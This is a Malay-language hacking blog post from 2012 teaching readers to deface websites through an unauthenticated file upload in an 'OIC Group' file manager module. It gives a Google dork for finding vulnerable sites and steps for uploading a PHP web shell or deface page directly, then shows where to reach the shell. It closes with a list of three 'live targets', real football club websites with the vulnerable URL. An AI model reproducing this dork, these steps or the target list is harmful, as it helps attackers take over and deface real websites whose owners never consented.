Sunday, 19 February 2012

OIC Group - Shell/Deface Upload Vulnerability

 By: Afif    19:31  ,    


Assalamualaikum dan salam sejahtera....hari ini aku nak ajar exploit lagi.exploit ni agak lama jugak.ok aku pun malas nak bercakap banyak.

Jom mula!


1.Cari web guna dork :

inurl:"modules/filemanagermodule/actions/?picker.php??id=0"


2. Pilih salah satu website dan buka.

note : tak perlu tambah exploit url di belakang url.bila buka web tu terus keluar.

3. Selepas itu tengok di sudut bawah sebelah kanan.Tengok akan ada kotak macam dalam gambar :



Click Choose File ,pilih shell/deface korang, dan click Go.


note : korang tak perlu menukar extension shell korang,korang boleh terus upload shell ber-extension php.
Contoh : Shell.php


4. Baiklah untuk melihat hasil :

http://www.target.com/files/Shell.php
atau
http://www.target.com/path/files/Shell.php


5. Done!

Live Targets :
http://www.admiralfc.co.uk/modules/filemanagermodule/actions/picker.php?id=0
http://www.dogandduckfc.com/newsite/modules/filemanagermodule/actions/picker.php?id=0
http://www.bantamorloff.co.uk/modules/filemanagermodule/actions/picker.php?id=0

Baiklah itu saja..Assalamualaikum~~
Item Reviewed: OIC Group - Shell/Deface Upload Vulnerability Description: Rating: 5 Reviewed By Afif

Share:
Posted by at
Labels: ,

Popular Posts

  • Senarai Laman Web Download Movie!
    Assalamualaikum dan salam sejahtera.Entry kali ini aku nak share satu benda yang best!Aku nak share dengan korang senarai mega website ...
  • Powered By Geeklog - Upload File Deface
    Assalamualaikum dan salam sejahtera...memandangkan mata ni belum bole lelap....aku nak sediakan satu tutorial deface untuk korang.Ianya ...
  • 3 Cara Nak Lajukan Internet
    Assalamualaikum dan salam sejahtera. Hari ni aku nak share 3 cara nak lajukan internet korang.Suka? Mestilah suka kan :P Ketiga-tiga cara n...
© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com